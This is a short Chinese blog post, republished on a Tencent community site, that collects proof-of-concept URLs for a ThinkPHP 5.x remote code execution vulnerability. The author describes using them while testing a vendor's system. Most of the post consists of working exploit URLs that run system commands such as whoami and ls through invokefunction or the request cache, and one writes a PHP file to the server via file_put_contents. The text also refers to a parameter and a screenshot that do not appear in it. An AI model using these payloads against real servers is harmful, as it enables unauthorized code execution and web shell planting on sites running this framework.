ThinPHP5.1 代码执行漏洞getshell poc总结

最近新出的thinkphp5.1的洞来的算是一场及时雨,正好在给某厂家内测,就派上用场了。

厂家的系统版本是 ThinkPHP V5.0.21

然后用了许多网上搜的poc都无法使用

http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=ls%20-l|system

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=1|phpinfo

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%27%20>%20info.php

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

今天在吐司上面https://www.t00ls.net/viewthread.phptid=48985&extra=&page=1看到了有人在讨论这个exp的问题

第二个poc测试成功了,发现可以回显phpinfo的内容,那么这一条代码在5.0.21的版本是可执行的

fuck作为一个传导参数,可以执行任意php命令,如果sytstem等一些参数被禁用了则不可执行。

所以在测试的时候,不要一上去就执行加一些函数的测试

这种调用system函数的测试,这样有时候回显不出来,是因为某些函数被禁用了,而不是漏洞不存在!

最后附上测试成功的截图

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20181214A0VGUA00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券